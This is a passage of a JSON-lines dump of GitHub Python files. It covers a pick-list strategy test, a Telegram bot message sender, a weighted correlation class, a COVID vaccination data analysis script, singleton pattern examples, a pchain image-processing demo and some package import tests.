default_pick_list[1:3], [2 / 5, 3 / 5]),\n ([1], [default_pick_list[0], default_pick_list[2]], [1 / 4, 3 / 4]),\n ([2], default_pick_list[:2], [1 / 3, 2 / 3]),\n ([0, 1], [default_pick_list[2]], [1]),\n ],\n)\ndef test_base_strategy_remove_item(\n items_indices, expected_pick_list, expected_weight_list\n):\n pick_list = default_pick_list[:3]\n weight_list = [1 / 6, 2 / 6, 3 / 6]\n strategy = BaseStrategy(pick_list=pick_list, weight_list=weight_list)\n strategy.remove_items(items_indices)\n assert strategy.pick_list == expected_pick_list\n assert [round(el, 6) for el in strategy.weight_list] == [\n round(el, 6) for el in expected_weight_list\n ]\n","repo_name":"EtienneTurc/IChooseYou","sub_path":"server/service/strategy/tests/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":3143,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"7"} +{"seq_id":"8974627394","text":"\"\"\"\nYou're expected to send messages via queues (async): *message_queue*.\nThis is a module with underlying synchronous implementation.\n\"\"\"\nimport logging\nimport time\nfrom typing import Iterable\n\nfrom telegram import Bot, Message as TgMessage\nfrom telegram.error import Unauthorized, BadRequest\n\nfrom rest_food.db import set_inactive\nfrom rest_food.entities import Reply\nfrom rest_food.enums import Provider, Workflow\nfrom rest_food.settings import TEST_TG_CHAT_ID, TELEGRAM_TOKEN_DEMAND, TELEGRAM_TOKEN_SUPPLY, STAGE\n\nlogger = logging.getLogger(__name__)\n\n\nclass FakeBot:\n sleep_time = 0.2\n\n def __init__(self, bot: Bot):\n self._bot = bot\n\n def _sleep(self):\n logger.warning('Sleep for %s s', self.sleep_time)\n time.sleep(0.2)\n\n def send_location(self, chat_id, *args, **kwargs):\n if chat_id in TEST_TG_CHAT_ID:\n return self._bot.send_location(chat_id, *args, **kwargs)\n else:\n self._sleep()\n\n def edit_message_text(self, text, chat_id, *args, **kwargs):\n if chat_id in TEST_TG_CHAT_ID:\n return self._bot.edit_message_text(text, chat_id, *args, **kwargs)\n else:\n self._sleep()\n\n def send_message(self, chat_id, *args, **kwargs):\n if chat_id in TEST_TG_CHAT_ID:\n return self._bot.send_message(chat_id, *args, **kwargs)\n else:\n self._sleep()\n\n def delete_message(self, chat_id, *args, **kwargs):\n if chat_id in TEST_TG_CHAT_ID:\n return self._bot.delete_message(chat_id, *args, **kwargs)\n else:\n self._sleep()\n\n def set_webhook(self, *args, **kwargs):\n return self._bot.set_webhook(*args, **kwargs)\n\n\ndef get_bot(workflow: Workflow):\n if workflow == Workflow.SUPPLY:\n token = TELEGRAM_TOKEN_SUPPLY\n else:\n token = TELEGRAM_TOKEN_DEMAND\n\n bot = Bot(token)\n\n if STAGE == 'dev':\n return FakeBot(bot)\n\n return bot\n\n\ndef send_messages(\n *,\n tg_chat_id: int,\n original_message: TgMessage = None,\n replies: Iterable[Reply],\n workflow: Workflow\n):\n \"\"\"\n It's intended to be async (vs `build_tg_response`).\n \"\"\"\n bot = get_bot(workflow)\n original_message_can_be_replaced = (\n (original_message and original_message.message_id) is not None\n )\n\n for reply in filter(lambda x: x is not None and (x.text or x.coordinates) is not None, replies):\n markup = _build_tg_reply_markup(reply)\n\n if reply.coordinates:\n bot.send_location(\n tg_chat_id,\n *(float(x) for x in reply.coordinates),\n reply_markup=None if reply.text else markup,\n )\n\n original_message_should_be_removed = original_message_can_be_replaced\n\n if reply.text:\n kwargs = {\n 'chat_id': tg_chat_id,\n 'text': reply.text,\n 'reply_markup': markup,\n 'parse_mode': 'HTML',\n }\n\n if original_message_can_be_replaced and original_message.text is not None and not reply.is_text_buttons:\n method = bot.edit_message_text\n original_message_should_be_removed = False\n kwargs['message_id'] = original_message.message_id\n else:\n method = bot.send_message\n\n # Actually we can keep track of sent `keyboard` messages and remove them on the next\n # interaction with the user.\n # On the other hand this is not likely to happen as this method is designed to query db.\n kwargs['reply_markup'] = kwargs['reply_markup'] or {'remove_keyboard': True}\n\n try:\n method(**kwargs)\n except Unauthorized:\n logger.warning(\n '%s is blocked for the bot. ',\n tg_chat_id\n )\n set_inactive(chat_id=tg_chat_id, provider=Provider.TG, workflow=workflow)\n\n except BadRequest as e:\n if 'the same' in e.message:\n pass\n elif 'Chat not found' in e.message:\n logger.warning('Tg chat %s not found', tg_chat_id)\n set_inactive(chat_id=tg_chat_id, provider=Provider.TG, workflow=workflow)\n else:\n logger.warning('Failed to send to tg_chat_id=%s', tg_chat_id)\n raise e\n\n if original_message_should_be_removed:\n bot.delete_message(chat_id=tg_chat_id, message_id=original_message.message_id)\n\n\ndef build_tg_response(*, chat_id: int, reply: Reply):\n \"\"\"\n Use it for direct/sync response (vs `send_messages`).\n \"\"\"\n response = {\n 'method': 'sendMessage',\n 'chat_id': chat_id,\n 'text': reply.text,\n }\n\n reply_markup = _build_tg_reply_markup(reply)\n if reply_markup is not None:\n response['reply_markup'] = reply_markup\n\n return response\n\n\ndef _build_tg_reply_markup(reply: Reply) -> dict:\n if not reply.buttons:\n return None\n\n if reply.is_text_buttons:\n return _build_tg_text_keyboard(reply.buttons)\n\n return _build_tg_inline_keyboard(reply.buttons)\n\n\ndef _build_tg_text_keyboard(keyboard):\n if not keyboard:\n return None\n\n return {\n 'keyboard': keyboard,\n 'one_time_keyboard': True,\n 'resize_keyboard': True,\n }\n\n\ndef _build_tg_inline_keyboard(keyboard):\n if not keyboard:\n return None\n\n inline_keyboard = [\n [\n _build_tg_keyboard_cell(cell) for cell in row\n ] for row in keyboard\n ]\n\n return {\n 'inline_keyboard': inline_keyboard,\n }\n\n\ndef _build_tg_keyboard_cell(cell):\n if isinstance(cell, dict):\n formatted_cell = {\n 'text': cell['text'],\n }\n\n if 'data' in cell:\n formatted_cell['callback_data'] = cell['data']\n elif 'url' in cell:\n formatted_cell['url'] = cell['url']\n\n return formatted_cell\n\n return {\n 'text': cell,\n 'callback_data': cell,\n }\n","repo_name":"demidov91/rest_food","sub_path":"rest_food/_sync_communication.py","file_name":"_sync_communication.py","file_ext":"py","file_size_in_byte":6076,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"10224576248","text":"import numpy as np\nimport pandas as pd\nfrom scipy.stats import rankdata\n\n__version__ = \"2.1.0\"\n\nclass WeightedCorr:\n def __init__(self, xyw=None, x=None, y=None, w=None, df=None, wcol=None):\n ''' Weighted Correlation class. Either supply xyw, (x, y, w), or (df, wcol). Call the class to get the result, i.e.:\n WeightedCorr(xyw=mydata[[x, y, w]])(method='pearson')\n :param xyw: pd.DataFrame with shape(n, 3) containing x, y, and w columns (column names irrelevant)\n :param x: pd.Series (n, ) containing values for x\n :param y: pd.Series (n, ) containing values for y\n :param w: pd.Series (n, ) containing weights\n :param df: pd.Dataframe (n, m+1) containing m phenotypes and a weight column\n :param wcol: str column of the weight column in the dataframe passed to the df argument.\n '''\n if (df is None) and (wcol is None):\n if np.all([i is None for i in [xyw, x, y, w]]):\n raise ValueError('No data supplied')\n if not ((isinstance(xyw, pd.DataFrame)) != (np.all([isinstance(i, pd.Series) for i in [x, y, w]]))):\n raise TypeError('xyw should be a pd.DataFrame, or x, y, w should be pd.Series')\n xyw = pd.concat([x, y, w], axis=1).dropna() if xyw is None else xyw.dropna()\n self.x, self.y, self.w = (pd.to_numeric(xyw[i], errors='coerce').values for i in xyw.columns)\n self.df = None\n elif (wcol is not None) and (df is not None):\n if (not isinstance(df, pd.DataFrame)) or (not isinstance(wcol, str)):\n raise ValueError('df should be a pd.DataFrame and wcol should be a string')\n if wcol not in df.columns:\n raise KeyError('wcol not found in column names of df')\n self.df = df.loc[:, [x for x in df.columns if x != wcol]]\n self.w = pd.to_numeric(df.loc[:, wcol], errors='coerce')\n else:\n raise ValueError('Incorrect arguments specified, please specify xyw, or (x, y, w) or (df, wcol)')\n\n def _wcov(self, x, y, ms):\n return np.sum(self.w * (x - ms[0]) * (y - ms[1]))\n\n def _pearson(self, x=None, y=None):\n x, y = (self.x, self.y) if ((x is None) and (y is None)) else (x, y)\n mx, my = (np.sum(i * self.w) / np.sum(self.w) for i in [x, y])\n return self._wcov(x, y, [mx, my]) / np.sqrt(self._wcov(x, x, [mx, mx]) * self._wcov(y, y, [my, my]))\n\n def _wrank(self, x):\n (unique, arr_inv, counts) = np.unique(rankdata(x), return_counts=True, return_inverse=True)\n a = np.bincount(arr_inv, self.w)\n return (np.cumsum(a) - a)[arr_inv]+((counts + 1)/2 * (a/counts))[arr_inv]\n\n def _spearman(self, x=None, y=None):\n x, y = (self.x, self.y) if ((x is None) and (y is None)) else (x, y)\n return self._pearson(self._wrank(x), self._wrank(y))\n\n def __call__(self, method='pearson'):\n '''\n :param method: Correlation method to be used: 'pearson' for pearson r, 'spearman' for spearman rank-order correlation.\n :return: if xyw, or (x, y, w) were passed to __init__ returns the correlation value (float).\n if (df, wcol) were passed to __init__ returns a pd.DataFrame (m, m), the correlation matrix.\n '''\n if method not in ['pearson', 'spearman']:\n raise ValueError('method should be one of [\\'pearson\\', \\'spearman\\']')\n cor = {'pearson': self._pearson, 'spearman': self._spearman}[method]\n if self.df is None:\n return cor()\n else:\n out = pd.DataFrame(np.nan, index=self.df.columns, columns=self.df.columns)\n for i, x in enumerate(self.df.columns):\n for j, y in enumerate(self.df.columns):\n if i >= j:\n out.loc[x, y] = cor(x=pd.to_numeric(self.df[x], errors='coerce'), y=pd.to_numeric(self.df[y], errors='coerce'))\n out.loc[y, x] = out.loc[x, y]\n return out\n","repo_name":"matthijsz/weightedcorr","sub_path":"WeightedCorr.py","file_name":"WeightedCorr.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"7"} +{"seq_id":"4152234721","text":"# -*- coding: utf-8 -*-\n\n# -- Sheet --\n\nimport numpy as np \nimport pandas as pd \n\nimport os\nfor dirname, _, filenames in os.walk(Dataplore):\n for filename in filenames:\n print(os.path.join(dirname, filename))\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport plotly.graph_objects as go\nimport plotly.express as px\nfrom plotly.subplots import make_subplots\nimport seaborn as sns\nimport datetime as dt\nfrom itertools import chain\n\nfrom ipywidgets import interact, interactive, fixed\nimport ipywidgets as widgets\nfrom IPython.display import display\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\nvacc1=pd.read_csv(\"http://api.covid19india.org/csv/latest/cowin_vaccine_data_statewise.csv\")\nvacc1.fillna(0)\nvacc1[\"Updated On\"]=pd.to_datetime(vacc1[\"Updated On\"],infer_datetime_format=True)\nvacc1.drop([\"AEFI\"],inplace=True,axis=1)\n#display(vacc1.columns)\n#display(vacc1)\n\nvacc=pd.read_csv(\"http://api.covid19india.org/csv/latest/vaccine_doses_statewise.csv\")\nvacc.fillna(0)\nvacc.index=vacc[\"State\"]\nvacc=vacc.T\nvacc.drop([\"State\"],inplace=True)\nvacc.index=pd.to_datetime(vacc.index,infer_datetime_format=True)\n#display(vacc)\n#display(vacc.columns)\n\ndef f(x):\n display(x)\n return x\n\nC = vacc1[\"State\"].unique()\nP = interactive(f, x=widgets.Dropdown(options=C,value='India',description='State:',disabled=False))\nprint(\"Select a state to view vaccination data:\")\ndisplay(P)\n\n#Total doses administered nationwide\nres=P.result\nState=vacc1[vacc1[\"State\"]==res]\nD=State[\"Updated On\"]\nX=State[\"Total Doses Administered\"]\nplt.figure(figsize=(16,8))\nplt.bar(D,X)\nplt.title(\"{}: Total doses administered\".format(res))\nplt.grid()\nplt.show()\n\n#First done vs fully vaccinated\nX=State[\"First Dose Administered\"]\nY=State[\"Second Dose Administered\"]\nP=Y/X*100\nplt.figure(figsize=(16,8))\nplt.plot(D,X,label=\"First dose\")\nplt.plot(D,Y,label=\"Second dose\")\nplt.title(\"First dose done vs Second dose done\")\nplt.grid()\nplt.legend()\nplt.show()\n\nplt.figure(figsize=(16,8))\nplt.plot(P,color=\"purple\")\nplt.title(\"Percentage of people fully vaccinated\")\nplt.grid()\nplt.show()\n\n#Male vs Female vaccinations\nA=State[State.index==(State.index).max()-3][\"Male(Individuals Vaccinated)\"].values\nB=State[State.index==(State.index).max()-3][\"Female(Individuals Vaccinated)\"].values\nnew=list(chain.from_iterable([A,B]))\nplt.pie(new,labels=[\"Male\",\"Female\"],radius=2,shadow=True,autopct='%1.1f%%',explode = [0,0.1])\nplt.title(\"Vaccinations completed\")\nplt.legend()\nplt.show()\n\n#Covaxin vs Covishield\nA=State[\"Total Covaxin Administered\"].diff()\nB=State[\"Total CoviShield Administered\"].diff()\nX=State[State.index==(State.index).max()-3][\"Total Covaxin Administered\"].values\nY=State[State.index==(State.index).max()-3][\"Total CoviShield Administered\"].values\n\nplt.figure(figsize=(16,8))\nplt.bar(D,B,label=\"CoviShield\",color=\"orange\")\nplt.bar(D,A,label='Covaxin',color=\"blue\")\nplt.title(\"Daily CoviShield vs Covaxin\")\nplt.legend(loc='upper right')\nplt.grid()\nplt.show()\n\nnew=list(chain.from_iterable([X,Y]))\nplt.pie(new,labels=[\"Covaxin\",\"CoviShield\"],radius=2,shadow=True,autopct='%1.1f%%',explode = [0,0.2])\nplt.title(\"Vaccine brand\")\nplt.legend()\nplt.show()\n\ndef f(x):\n display(x)\n return x\n\nC = vacc.columns[1:38]\nP = interactive(f, x=widgets.Dropdown(options=C,value='Bihar',description='State:',disabled=False))\nprint(\"Select a state to view vaccination data:\")\ndisplay(P)\n\nState = P.result\nX=vacc[\"Total\"] #Total Vaccinations\nY=vacc[State] #State total vaccinations\nDX=X.diff() #Daily vaccinations\nDY=Y.diff() #State Vaccinations\nD=vacc.index\n\nplt.figure(figsize=(16,8))\nplt.bar(D,abs(DY))\nplt.title(\"Daily {} Vaccinations\".format(State))\nplt.grid()\nplt.show()\n\nstate_names=[\"India\",'Andaman Nicobar', 'Andhra P', 'Arunachal P',\n 'Assam', 'Bihar', 'Chandigarh', 'Chhattisgarh',\n 'Daman and Diu', 'Delhi', 'Goa', 'Gujarat',\n 'Haryana', 'Himachal P', 'Jammu Kashmir', 'Jharkhand',\n 'Karnataka', 'Kerala', 'Ladakh', 'Lakshadweep', 'Madhya P',\n 'Maharashtra', 'Manipur', 'Meghalaya', 'Mizoram', 'Nagaland', 'Odisha',\n 'Puducherry', 'Punjab', 'Rajasthan', 'Sikkim', 'Tamil Nadu',\n 'Telangana', 'Tripura', 'Uttar P', 'Uttarakhand', 'West Bengal']\n\nst_df=pd.DataFrame()\nfor st in vacc.columns:\n X=vacc[st][len(vacc)-2]\n #print(\"{}: {}\".format(st,X))\n st_df=st_df.append([X])\n \nst_df.index=vacc.columns\nst_df.rename(index={\"Total\":\"India\"},inplace=True)\nst_df.drop([\"Miscellaneous\"],inplace=True)\nst_df.columns=[\"Vaccinations\"]\nsorted_st_df=st_df.sort_values(by=[\"Vaccinations\"],ascending=False)\n\npop=pd.read_csv('State-census.csv')\npop[\"Population\"]=pd.to_numeric(pop[\"Population\"],errors=\"coerce\")\npop[\"Density\"]=pd.to_numeric(pop[\"Density\"],errors=\"coerce\")\npop[\"Growth Rate\"]=pd.to_numeric(pop[\"Growth Rate\"],errors=\"coerce\")\ndisplay(pop.head())\n\n#Adding columns to new dataset for vaccinations and population.\nst_df[\"Population\"]=pop[\"Population\"].values\nst_df[\"Urban Pop\"]=pop[\"Urban Population\"].values\nst_df[\"Rural Pop\"]=pop[\"Rural Population\"].values\nst_df[\"Sex Ratio\"]=pop[\"Sex Ratio\"].values\ndisplay(st_df.head())\n\nplt.figure(figsize=(16,10))\nsns.barplot(sorted_st_df[\"Vaccinations\"][1:],sorted_st_df.index[1:],saturation=1,orient=\"h\")\nplt.title(\"Total Vaccinations\",size=20)\nplt.grid()\nplt.xticks(rotation=90,size=12)\nplt.tight_layout()\nplt.show()\n\n# Top 5 vaccinated states\nplt.figure(figsize=(10,6))\nplt.plot(sorted_st_df[1:].head())\nplt.title(\"Maximun vaccinated States\")\nplt.grid()\n\ngender_df=pd.DataFrame()\nbrand_df=pd.DataFrame()\nfor st in vacc1[\"State\"].unique():\n sp=vacc1[vacc1[\"State\"]==st]\n X=sp[sp.index==(sp.index).max()-3][\"Male(Individuals Vaccinated)\"].values\n Y=sp[sp.index==(sp.index).max()-3][\"Female(Individuals Vaccinated)\"].values\n Covishield=sp[sp.index==(sp.index).max()-3][\"Total CoviShield Administered\"].values\n Covaxin=sp[sp.index==(sp.index).max()-3][\"Total Covaxin Administered\"].values\n gender_df=gender_df.append(list(zip(X,Y)))\n brand_df=brand_df.append(list(zip(Covaxin,Covishield)))\n \ngender_df.columns=[\"Male\",\"Female\"]\nbrand_df.columns=[\"Covaxin\",\"Covishield\"]\ngender_df.index=state_names\nbrand_df.index=state_names\n#gender_df.sort_values(by=[\"Male\"],ascending=False,inplace=True)\n\n#Comparison of gender and brands\nGen = go.Figure(data=[go.Bar(x=gender_df.index[1:],y=gender_df[\"Male\"][1:], #Trace 1\n name=\"Male\",\n marker = dict(color = 'rgba(0, 0, 255,1)'),\n ),\n go.Bar(x=gender_df.index[1:],y=gender_df[\"Female\"][1:],name=\"Female\",\n marker=dict(color = 'rgba(255, 0, 0,1)')),\n ] \n )\nGen.update_xaxes(\n tickangle = 90,\n title_font = {\"size\": 1},\n)\nGen.update_layout(\n height=600,\n margin=dict(l=20,r=20,b=50,t=50),\n title=\"Male vs Female\",\n xaxis_title=\"State\",\n yaxis_title=\"Vaccinations\",\n legend_title=\"Gender: \",\n paper_bgcolor='#9ef7ad',\n xaxis=dict(\n rangeselector=dict(\n buttons=list([dict(count=3,step=\"month\",stepmode=\"backward\"),\n dict(count=6,step=\"month\",stepmode=\"backward\"),\n dict(count=1,step=\"year\",stepmode=\"backward\")])\n ),\n rangeslider=dict(visible=True),\n )\n)\n\nBrand = go.Figure(data=[go.Bar(x=brand_df.index[1:],y=brand_df[\"Covaxin\"][1:], #Trace 1\n name=\"Covaxin\",\n marker = dict(color = 'rgba(0, 0, 255,1)'),\n ),\n go.Bar(x=brand_df.index[1:],y=brand_df[\"Covishield\"][1:],\n name=\"Covishield\",\n marker=dict(color = 'rgba(255, 0, 0,1)')),\n ] \n )\nBrand.update_xaxes(\n tickangle = 90,\n title_font = {\"size\": 1},\n)\nBrand.update_layout(\n height=600,\n margin=dict(l=20,r=20,b=50,t=50),\n title=\"Covaxin vs Covishield\",\n xaxis_title=\"State\",\n yaxis_title=\"Vaccinations\",\n legend_title=\"Brand: \",\n paper_bgcolor='#9ef7ad',\n xaxis=dict(\n rangeselector=dict(\n buttons=list([dict(count=3,step=\"month\",stepmode=\"backward\"),\n dict(count=6,step=\"month\",stepmode=\"backward\"),\n dict(count=1,step=\"year\",stepmode=\"backward\")])\n ),\n rangeslider=dict(visible=True),\n )\n)\n\nGen.show()\nBrand.show()\n\n#Brand Wise:\n\n#All the states have used CoviShield as their primary vaccine, clearly. Overall, Covishield takes up almost 90% of the total vaccinations in India while Covaxin take up a small value of 10%\n\n#Sex Ratio:\n\n#The sex ratio is the ratio of males to females in the population (normalized to 1000). Shown below is the sex ratio for each state in India.\n\n#It basically shows the number of females per 1000 males.\n\nplt.figure(figsize=(16,6))\nplt.plot(pop[\"State\"],pop[\"Sex Ratio\"])\nplt.scatter(pop[\"State\"],pop[\"Sex Ratio\"])\nplt.ylabel(\"Number of females\")\nplt.xticks(rotation=90)\nplt.xticks(rotation=90)\nplt.title(\"Sex Ratio State-wise\")\nplt.grid()\nplt.show()\n\n#As we can see, most of the states have a higher number of males (i.e. a sex ratio <1000). Only kerala and puduchery have more females.\n\n#Population\nplt.figure(figsize=(18,6))\nsns.barplot(pop[\"State\"][:36],pop[\"Population\"][1:]*100)\nplt.xticks(rotation=90)\nplt.grid()\nplt.show()\n\n#Population Density\nplt.figure(figsize=(16,8))\nplt.plot(pop[\"State\"][:36],pop[\"Density\"][:36],color=\"purple\")\nplt.title(\"Population Density\")\nplt.xticks(rotation=90)\nplt.grid()\nplt.show()\n\nur_per=pop[\"Urban Population\"][:36]*100/pop[\"Population\"][:36]\nrur_per=pop[\"Rural Population\"][:36]*100/pop[\"Population\"][:36]\n\nplt.figure(figsize=(16,8))\nplt.plot(pop[\"State\"][:36],rur_per,label=\"Rural\")\nplt.plot(pop[\"State\"][:36],ur_per,label=\"Urban\")\nplt.scatter(pop[\"State\"][:36],rur_per)\nplt.scatter(pop[\"State\"][:36],ur_per)\nplt.title(\"Urban vs Rural population (%)\")\nplt.xticks(rotation=90)\nplt.legend()\nplt.grid()\nplt.show()\n\n# **VACCINATION STATUS**\n\n\nplt.figure(figsize=(18,6))\nplt.bar(st_df.index,(st_df[\"Vaccinations\"]*100/st_df[\"Population\"]),color=\"#D2B48C\")\nplt.title(\"Vaccinations / Population\")\nplt.xticks(rotation=90) \nplt.grid()\nplt.show()\n\n# **CORELATION B/W RURAL && URBAN**\n\n\n#Vaccinations in urban and rural areas\nf, ax = plt.subplots(1, 2, figsize = (20, 6))\n\nsns.regplot(st_df[\"Urban Pop\"][:36],st_df[\"Vaccinations\"][:36],ax=ax[0])\nax[0].grid()\nax[0].set_xlabel(\"Urban Population\",fontSize=15)\n\nsns.regplot(st_df[\"Rural Pop\"][:36],st_df[\"Vaccinations\"][:36],ax=ax[1])\nax[1].grid()\nax[1].set_xlabel(\"Rural Population\",fontSize=15)\n\nplt.show()\n\n#Correlation between urban population and vaccination\nnewdf =st_df[['Vaccinations','Urban Pop','Rural Pop']]\ncorrelation = newdf.corr()\nsns.heatmap(correlation, cmap=\"Blues\",linewidths=2,annot=True) \nplt.tight_layout()\n\n# If the value is near ± 1, then it said to be a perfect correlation: as one variable increases, the other variable tends to also increase (if positive) or decrease (if negative). High degree: If the coefficient value lies between ± 0.50 and ± 1, then it is said to be a strong correlation. Hence a strong corelation can be seen in Rural Vs Urban Population\n\n\n\n\n","repo_name":"shubhamjaiswal889/Vaccination-Analysis","sub_path":"Vaccination Status.py","file_name":"Vaccination Status.py","file_ext":"py","file_size_in_byte":11240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"17179458120","text":"from __future__ import annotations\nfrom typing import Optional\n\n\nclass Logger:\n _instance = None\n\n def __new__(cls, *args, **kwargs):\n if cls._instance is None:\n cls._instance = super(Logger, cls).__new__(cls)\n return cls._instance\n\n def __init__(self, level):\n # 会被调用多次\n self.level = level\n\n\nclass SingletonMeta(type):\n \"\"\"\n The Singleton class can be implemented in different ways in Python. Some\n possible methods include: base class, decorator, metaclass. We will use the\n metaclass because it is best suited for this purpose.\n \"\"\"\n\n _instance: Optional[Singleton] = None\n\n def __call__(cls, *args, **kwargs) -> Singleton:\n if cls._instance is None:\n cls._instance = super().__call__(*args, **kwargs)\n return cls._instance\n\n\nclass Singleton(metaclass=SingletonMeta):\n\n def __init__(self, value: str) -> None:\n print('*' * 10) # 只会被调用1次\n self.value = value\n\n def some_business_logic(self):\n \"\"\"\n Finally, any singleton should define some business logic, which can be\n executed on its instance.\n \"\"\"\n\n # ...\n\n\nif __name__ == '__main__':\n logger1 = Logger('info')\n logger2 = Logger('debug')\n assert logger1 is logger2\n assert logger1.level == 'debug'\n assert logger2.level == 'debug'\n\n s1 = Singleton(10)\n s2 = Singleton(20)\n if id(s1) == id(s2):\n print(s1.value)\n print(s2.value)\n print(\"Singleton works, both variables contain the same instance.\")\n else:\n print(\"Singleton failed, variables contain different instances.\")\n","repo_name":"miniyk2012/leetcode","sub_path":"desgin_pattern/singleton/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"25982948486","text":"import sys\nimport os\ntry:\n import pchain\nexcept Exception as exc:\n pchain_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),'../')\n sys.path.insert(0,pchain_path)\n import pchain\nfrom pchain import pydata\nfrom pchain import pyproc\nfrom pchain.pydata import PCPyDataClass\nfrom pchain.pyproc import PCPyProcClass\n\nfrom PIL import Image\n\nService = pchain.cleinit()\nimport libstarpy\n\nrealm = Service.PCRealmBase._New()\n\npydata.DefineType('SizeClass',type(()))\npydata.DefineType('IntClass',type(int))\npydata.DefineType('ImageFileClass',type(''))\npydata.DefineType('ImageClass')\npydata.DefineType('ImageFormatClass',type(''))\npydata.DefineType('ImageHistogramClass',type([]))\n\n@pyproc.DefineProc('ImageOpenProc',ImageFileClass,ImageClass)\ndef Execute(self,ImageFile) : \n Context = self.Context # first must save Context in local variable\n im = Image.open(ImageFile.value())\n return (0,1,ImageClass(im))\n \n@pyproc.DefineProc('ImageResizeProc',(ImageClass,SizeClass),ImageClass)\ndef Execute(self,InputImage,NewSize) : \n Context = self.Context # first must save Context in local variable\n if Context['SelfObj'].Status < 0 :\n return (0,0,None)\n if Context['Cell'].IsFromOutSide(NewSize) == False :\n print( 'size ',NewSize.value(),' is from internal, reject it')\n Context['SelfObj'].RejectInput(NewSize)\n return (2,0,None)\n newim = InputImage.value().resize(NewSize.value())\n #--set source image\n Context['SelfObj'].AddOutputDataEx(ImageClass(newim),InputImage)\n return (0,1,None)\n\n@pyproc.DefineProc('ImageSizeProc',ImageClass,SizeClass)\ndef Execute(self,InputImage) : \n Context = self.Context # first must save Context in local variable\n return (0,1,SizeClass(InputImage.value().size))\n \n@pyproc.DefineProc('ImageFormatProc',ImageClass,ImageFormatClass)\ndef Execute(self,InputImage) : \n Context = self.Context # first must save Context in local variable\n if Context['SelfObj'].Status < 0 :\n return (0,0,None) \n if InputImage.value().format == None :\n return (2,-1,None) \n return (0,1,ImageFormatClass(InputImage.format)) \n \n@pyproc.DefineProc('ImageHistogramProc',ImageClass,ImageHistogramClass)\ndef Execute(self,InputImage) : \n Context = self.Context # first must save Context in local variable\n return (0,1,ImageHistogramClass(InputImage.value().histogram()))\n \nresult = realm.RunProc((ImageFileClass('pchain.png'),SizeClass((100,100))),None,ImageOpenProc,ImageResizeProc)\nprint(result)\nimg = result\n\nresult = realm.RunProc(img,None,ImageFormatProc,ImageSizeProc,ImageHistogramProc)\nprint(result)\n\nresult = realm.RunProc(img,('m',ImageHistogramClass,'m',SizeClass),ImageFormatProc,ImageSizeProc,ImageHistogramProc)\nprint(result)\n\nprint('dynamic add proc......')\n\n@realm._RegScriptProc_P('OnCellToBeFinish')\ndef OnCellToBeFinish(Realm,cell):\n print('ImageOpenProc is executed? ',cell.IsProcExecuted(ImageOpenProc))\n output = cell.GetCellMissingOutput()\n if output._Number == 0 :\n return False\n for item in output :\n if cell.IsCellOutputMustExist(item) == True :\n input = cell.GetEnvData()\n chain = Realm.BuildProcChain(output,input)\n if chain[0] == False :\n return False # failed\n if cell.FindProc(chain[1]) == None :\n cell.AddProc(chain[1])\n return True\n else :\n return False\n \n@realm._RegScriptProc_P('OnOutputDataToEnv')\ndef OnOutputDataToEnv(Realm,cell,proc,datalist): \n print('output data ',str(datalist))\n\nprint('+++++++++++++++++++++++++')\nresult = realm.RunProc(img,('m',ImageHistogramClass,'m',SizeClass),ImageFormatProc,ImageSizeProc)\nprint(result)\n\nresult = realm.RunProc(img,(ImageHistogramClass,SizeClass),ImageFormatProc,ImageSizeProc)\nprint(result)\n\n\nprint('source is ',str(result[0].GetSource()[0]))\n\npchain.cleterm() ","repo_name":"srplab/pchain","sub_path":"examples/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"9675407366","text":"try:\n\ttry:\n\t\timport context\n\texcept Exception as ImportErr: # pragma: no branch\n\t\tImportErr = None\n\t\tdel ImportErr\n\t\tfrom . import context\n\tif context.__name__ is None:\n\t\traise ImportError(\"[CWE-758] Failed to import context\")\n\telse:\n\t\tfrom context import unittest as unittest\n\t\tfrom context import piaplib as piaplib\n\t\tif piaplib.__name__ is None: # pragma: no branch\n\t\t\traise ImportError(\"[CWE-758] Failed to import piaplib\")\nexcept Exception:\n\traise ImportError(\"[CWE-758] Failed to import test context\")\n\n\nclass PKUTestSuite(unittest.TestCase):\n\t\"\"\"Special Pocket PKU test cases.\"\"\"\n\n\tdef test_syntax(self):\n\t\t\"\"\"Test case importing code.\"\"\"\n\t\ttheResult = False\n\t\ttry:\n\t\t\tfrom piaplib import pku\n\t\t\tif pku.__name__ is None:\n\t\t\t\ttheResult = False\n\t\t\ttheResult = True\n\t\texcept Exception as impErr:\n\t\t\tprint(str(type(impErr)))\n\t\t\tprint(str(impErr))\n\t\t\ttheResult = False\n\t\tassert theResult\n\n\tdef test_z_case_pku_insane_none(self):\n\t\t\"\"\"Tests the imposible state for pku given bad tools\"\"\"\n\t\ttheResult = False\n\t\ttry:\n\t\t\timport piaplib.pku.__main__\n\t\t\tself.assertIsNotNone(piaplib.pku.__main__.usePKUTool(\"NoSuchTool\"))\n\t\t\tself.assertIsNotNone(piaplib.pku.__main__.usePKUTool(None))\n\t\t\ttheResult = True\n\t\texcept Exception as err:\n\t\t\tprint(str(\"\"))\n\t\t\tprint(str(type(err)))\n\t\t\tprint(str(err))\n\t\t\tprint(str((err.args)))\n\t\t\tprint(str(\"\"))\n\t\t\terr = None\n\t\t\tdel err\n\t\t\ttheResult = False\n\t\tself.assertTrue(theResult, \"Error leaked while testing piaplib.pku.__main__.usePKUTool()\")\n\n\nif __name__ == u'__main__':\n\tunittest.main()\n","repo_name":"reactive-firewall/PiAP-python-tools","sub_path":"tests/test_pku.py","file_name":"test_pku.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"43191548297","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# 